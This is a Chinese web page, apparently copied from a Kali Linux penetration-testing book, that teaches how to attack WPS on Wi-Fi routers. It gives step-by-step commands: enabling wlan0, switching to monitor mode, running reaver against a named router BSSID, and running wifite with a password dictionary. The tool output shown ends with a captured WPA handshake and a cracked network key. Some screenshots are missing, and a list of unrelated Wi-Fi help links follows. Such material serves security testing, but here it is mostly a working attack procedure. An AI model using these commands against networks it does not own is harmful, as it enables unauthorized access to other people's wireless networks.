从输出的信息中可以看到,只有一个以太网接口eth0 。这是因为无线网卡可能没有启动,首先来启动该无线网卡 。执行命令如下所示:
root@Kali:~# ifconfig wlan0 up
执行以上命令后,没有任何信息输出 。此时再次执行ifconfig命令,查看无线网络是否已启动,如下所示:
root@Kali:~# ifconfig......wlan0Link encap:Ethernet HWaddr 08:10:76:49:c3:cdUP BROADCAST MULTICAST MTU:1500 Metric:1RX packets:0 errors:0 dropped:0 overruns:0 frame:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
看到以上输出信息,则表示无线网卡已成功启动,其网络接口为wlan0 。
(2)启动无线网卡为监听模式 。执行命令如下所示:
文章插图
从输出的信息中,可以看到monitor mode enabled on mon0,表示无线网卡已启动监听模式 。在以上信息中,还可以看到无线网卡的芯片级驱动类型 。其中,该网卡的芯片为Ralink,默认驱动为rt2800usb 。
文章插图
注意:执行以上命令启动监听模式,一定要确定正确识别无线网卡的芯片和驱动 。否则,该无线网卡可能导致攻击失败 。
(3)攻击WPS 。执行命令如下所示:
root@kali:~# reaver -i mon0 -b 14:E6:E4:AC:FB:20 -vvReaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@ tacnetsol.com>[+] Waiting for beacon from 14:E6:E4:AC:FB:20[+] Switching mon0 to channel 1[+] Switching mon0 to channel 2[+] Switching mon0 to channel 3[+] Switching mon0 to channel 11[+] Switching mon0 to channel 4[+] Switching mon0 to channel 5[+] Switching mon0 to channel 6[+] Switching mon0 to channel 7[+] Associated with 8C:21:0A:44:09:F8 (ESSID: yztxty)[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message[+] Received WSC NACK[+] Sending WSC NACK......
从以上输出信息中,可以看到正在等待连接到14:E6:E4:AC:FB:20无线路由器的信号 。并且通过发送PIN信息,获取密码 。如果没有路由器没有开启WPS的话,将会出现如下所示的信息:
[!] WARNING: Failed to associate with 14:E6:E4:AC:FB:20 (ESSID: XXXX)
Fern WiFi Cracker是一个非常不错的工具,用来测试无线网络安全 。后面将会介绍使用该工具,攻击Wi-Fi网络 。这里首先介绍使用Fern WiFi Cracker工具来攻击WPS 。【实例9-2】使用Wifite攻击WPS 。具体操作步骤如下所示 。
(1)启动Wifite工具,并指定使用common.txt密码字典 。在命令行终端执行如下所示的命令:
root@kali:~# wifite -dict common.txt
执行以上命令后,将显示如下所示的信息:文章插图
以上信息显示了WiFite工具的版本信息,支持平台,并且开始扫描无线网络 。当扫描到想要破解的无线网络时,按下CTRL+C组合键停止扫描 。
(2)停止扫描无线网络,将显示如下所示的信息:
文章插图
从以上输出信息中,可以看到扫描到五个无线接入点和三个客户端 。在输出信息中,共显示了7列 。分别表示无线接入点编号、ESSID号、信道、加密方式、电功率、是否开启wps和客户端 。如果仅有一个客户端连接到无线接入点,则CLIENT列显示是client 。如果有多个客户端连接的话,则显示是clients 。
(3)此时,选择要攻击的无线接入点 。这里选择第五个无线接入点,输入“1” 。然后按下回车键将开始攻击,显示信息如下所示:
[+] select target numbers (1-5) separated by commas, or \'all\': 1[+] 1 target selected.[0:00:00] initializing WPS PIN attack on yzty (EC:17:2F:46:70:BA) [0:11:00] WPS attack, 0/0 success/ttl, [!] unable to complete successful try in 660 seconds [+] skipping yzty [0:08:20] starting wpa handshake capture on \"yzty\" [0:08:11] new client found: 18:DC:56:F0:62:AF [0:08:09] listening for handshake… [0:00:11] handshake captured! saved as \"hs/yzty_EC-17-2F-46-70-BA.cap\" [+] 2 attacks completed: [+] 1/2 WPA attacks succeededyzty (EC:17:2F:46:70:BA) handshake capturedsaved as hs/yzty_EC-17-2F-46-70-BA.cap [+] starting WPA cracker on 1 handshake [0:00:00] cracking yzty with aircrack-ng [+] cracked yzty (EC:17:2F:46:70:BA)! [+] key:\"huolong5\"[+] quitting
- 电脑设置路由器密码的基础教程 电脑如何设或更改WIFI密码
- 电脑文件加密最简单的方法 电脑文件怎么加密
- wifi断网的解决方法 wifi断网怎么回事
- 查看wifi密码简单方法 如何查看wifi密码
- 查看连接wifi密码的方法 怎么查wifi密码是多少
- wifi连接不上怎么办 WiFi无法连接到网络解决方法
- 如何让手机显示wifi密码 华为手机查看wifi密码最简单方法
- wifi为什么连接不上 wi-fi连不上去的解决方法
- wifi密码忘记了找回的方法 家里wifi密码忘了怎么找回
- 为啥wifi显示已连接不可上网 wifi已连接但无法访问互联网咋办